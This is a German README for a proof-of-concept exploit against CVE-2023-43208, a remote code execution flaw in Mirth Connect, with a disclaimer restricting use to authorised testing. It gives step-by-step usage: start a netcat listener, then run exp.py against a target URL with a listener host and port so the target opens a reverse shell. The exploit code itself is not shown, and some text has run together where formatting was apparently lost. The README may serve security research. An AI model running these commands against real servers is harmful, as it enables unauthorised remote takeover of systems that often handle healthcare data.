
PoC for CVE-2023-43208 RCE exploitation.
Proof-of-Concept Python-Skript, das auf CVE-2023-43208 in Mirth Connect abzielt.
Verwenden Sie dieses Skript nur in Umgebungen, die Ihnen gehören oder für die Sie ausdrücklich autorisiert sind. Dieses Repository dient der Sicherheitsforschung, Validierung und defensiven Tests. Der Autor übernimmt keine Verantwortung für Missbrauch oder Schäden, die durch dieses Tool verursacht werden.
exp.py ist eine minimal abhängige Version des PoC, die:
/api/server/version an4.4.1 ist/api/users, wenn das Ziel angreifbar erscheintDas Skript verwendet standardmäßig HTTPS und kann mit --http auf HTTP umgestellt werden.
python3 exp.py -u <target> -lh <listener_host> -lp <listener_port> [--http]
-u, --url: Ziel-Mirth-Connect-URL oder -Host-lh, --lhost: Lokaler Host/IP für die Reverse-Verbindung-lp, --lport: Lokaler Listening-Port--http: HTTP statt HTTPS erzwingen (Standard ist HTTPS)Starten Sie zuerst einen Listener:
nc -lvnp 4444
Führen Sie das Skript aus:
python3 exp.py -u https://target.example.com -lh 192.168.1.10 -lp 4444
Für ein reines HTTP-Ziel:
python3 exp.py -u target.example.com -lh 192.168.1.10 -lp 4444 --http
4.4.1.K3ysTr0K3R und Chocapikkpredyy